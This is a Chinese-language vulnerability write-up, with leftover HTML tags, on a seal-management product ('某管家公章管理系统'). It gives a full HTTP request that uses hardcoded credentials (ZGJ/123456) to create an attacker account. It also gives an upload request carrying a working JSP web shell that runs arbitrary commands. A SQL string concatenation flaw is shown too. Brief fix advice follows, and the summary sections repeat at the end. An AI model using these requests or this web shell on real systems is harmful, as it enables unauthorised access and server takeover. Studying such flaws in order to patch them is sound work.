某管家公章管理系统安全审计与漏洞分析<\/h1>

系统概述<\/h2>
某管家公章管理系统存在多个安全漏洞，包括认证绕过和文件上传漏洞，可能导致未授权用户创建账户并获取系统权限。<\/p>

漏洞分析<\/h2>

1. 用户创建接口认证绕过<\/h3>

漏洞路径<\/h4>

\/userCreate<\/code> 路由<\/li>
<\/ul>
漏洞详情<\/h4>


认证检查<\/strong>:<\/p>

系统通过 checkUnamePass<\/code> 方法进行认证<\/li>
要求 bimRemoteUser<\/code> 为 ZGJ<\/code><\/li>
要求 bimRemotePwd<\/code> 为 123456<\/code><\/li>
<\/ul>
<\/li>

SQL查询条件<\/strong>:<\/p>
String sql =<\/span> "select * from department where orgId = '"<\/span> +<\/span> orgId +<\/span> "'"<\/span>;<\/span>
<\/span><\/span><\/code><\/pre>
需要传入有效的 orgId<\/code> 使 departmentList<\/code> 不为空<\/li>
<\/ul>
<\/li>

用户创建流程<\/strong>:<\/p>

认证通过后可直接创建新用户<\/li>
<\/ul>
<\/li>
<\/ol>
利用方法<\/h4>


首先获取有效的 orgId<\/code>:<\/p>

通过另一个未授权接口获取系统中存在的 orgId<\/code><\/li>
<\/ul>
<\/li>

使用获取的 orgId<\/code> 构造请求创建用户:<\/p>
POST<\/span> \/userCreate HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target.com<\/span>
<\/span><\/span>Content-Type:<\/span> application\/json<\/span>
<\/span><\/span>
<\/span><\/span>{
<\/span><\/span>  "bimRemoteUser"<\/span>: "ZGJ"<\/span>,
<\/span><\/span>  "bimRemotePwd"<\/span>: "123456"<\/span>,
<\/span><\/span>  "orgId"<\/span>: "获取到的有效orgId"<\/span>,
<\/span><\/span>  "username"<\/span>: "attacker"<\/span>,
<\/span><\/span>  "password"<\/span>: "hacked123"<\/span>
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>

使用创建的用户凭据登录系统<\/p>
<\/li>
<\/ol>
2. 文件上传漏洞<\/h3>
系统存在多个文件上传点，可被用于获取WebShell。<\/p>
漏洞点1: Logo上传<\/h4>


上传处理<\/strong>:<\/p>

使用 Base64StrToImage.base64MutipartFile<\/code> 方法<\/li>
将Base64编码的图像字符串转换为 MultipartFile<\/code> 对象<\/li>
<\/ul>
<\/li>

上传格式<\/strong>:<\/p>
data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAA...
<\/code><\/pre>
<\/li>

返回信息<\/strong>:<\/p>

上传成功后返回文件具体路径<\/li>
<\/ul>
<\/li>

利用方法<\/strong>:<\/p>

构造恶意Base64编码的JSP文件上传<\/li>
访问返回的路径执行WebShell<\/li>
<\/ul>
<\/li>
<\/ol>
漏洞点2: 通用文件上传<\/h4>


可控参数<\/strong>:<\/p>

moudleDir<\/code>: 控制上传目录<\/li>
最终路径格式: \/[moudleDir]\/年\/年-月\/年-月-日\/<\/code><\/li>
<\/ul>
<\/li>

文件命名<\/strong>:<\/p>

使用UUID格式: eca21ae6-61c3-4fd7-9903-93d7a0eb2166<\/code><\/li>
需要爆破文件名<\/li>
<\/ul>
<\/li>

利用方法<\/strong>:<\/p>
POST<\/span> \/uploadFileWeb HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> target.com<\/span>
<\/span><\/span>Content-Type:<\/span> multipart\/form-data<\/span>
<\/span><\/span>
<\/span><\/span>--boundary
<\/span><\/span>Content-Disposition: form-data; name="moudleDir"
<\/span><\/span>
<\/span><\/span>\/data\/upload\/
<\/span><\/span>--boundary
<\/span><\/span>Content-Disposition: form-data; name="file"; filename="shell.jsp"
<\/span><\/span>
<\/span><\/span><%@page import="java.util.*,java.io.*"%>
<\/span><\/span><%
<\/span><\/span>if(request.getParameter("cmd")!=null){
<\/span><\/span>    Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
<\/span><\/span>    OutputStream os = p.getOutputStream();
<\/span><\/span>    InputStream in = p.getInputStream();
<\/span><\/span>    DataInputStream dis = new DataInputStream(in);
<\/span><\/span>    String disr = dis.readLine();
<\/span><\/span>    while(disr!=null){
<\/span><\/span>        out.println(disr);
<\/span><\/span>        disr=dis.readLine();
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>%>
<\/span><\/span>--boundary--
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
防御建议<\/h2>


认证绕过修复<\/strong>:<\/p>

实现严格的认证机制<\/li>
不要使用硬编码凭据<\/li>
对敏感操作实施多因素认证<\/li>
<\/ul>
<\/li>

SQL注入防护<\/strong>:<\/p>

使用参数化查询<\/li>
实施最小权限原则<\/li>
<\/ul>
<\/li>

文件上传安全<\/strong>:<\/p>

验证文件类型和内容<\/li>
限制上传目录不可执行<\/li>
随机化文件名并记录上传日志<\/li>
对上传文件进行病毒扫描<\/li>
<\/ul>
<\/li>

系统加固<\/strong>:<\/p>

定期安全审计<\/li>
更新依赖库<\/li>
实施WAF防护<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
该公章管理系统存在严重的安全隐患，攻击者可利用认证绕过漏洞创建管理员账户，再通过文件上传漏洞获取服务器控制权。建议立即修复这些漏洞并加强系统安全防护措施。<\/p>

某管家公章管理系统安全审计与漏洞分析<\/h1>

系统概述<\/h2> 某管家公章管理系统存在多个安全漏洞，包括认证绕过和文件上传漏洞，可能导致未授权用户创建账户并获取系统权限。<\/p>

漏洞分析<\/h2>

1. 用户创建接口认证绕过<\/h3>

2. 文件上传漏洞<\/h3> 系统存在多个文件上传点，可被用于获取WebShell。<\/p>

总结<\/h2> 该公章管理系统存在严重的安全隐患，攻击者可利用认证绕过漏洞创建管理员账户，再通过文件上传漏洞获取服务器控制权。建议立即修复这些漏洞并加强系统安全防护措施。<\/p>

系统概述<\/h2>
某管家公章管理系统存在多个安全漏洞，包括认证绕过和文件上传漏洞，可能导致未授权用户创建账户并获取系统权限。<\/p>

2. 文件上传漏洞<\/h3>
系统存在多个文件上传点，可被用于获取WebShell。<\/p>

总结<\/h2>
该公章管理系统存在严重的安全隐患，攻击者可利用认证绕过漏洞创建管理员账户，再通过文件上传漏洞获取服务器控制权。建议立即修复这些漏洞并加强系统安全防护措施。<\/p>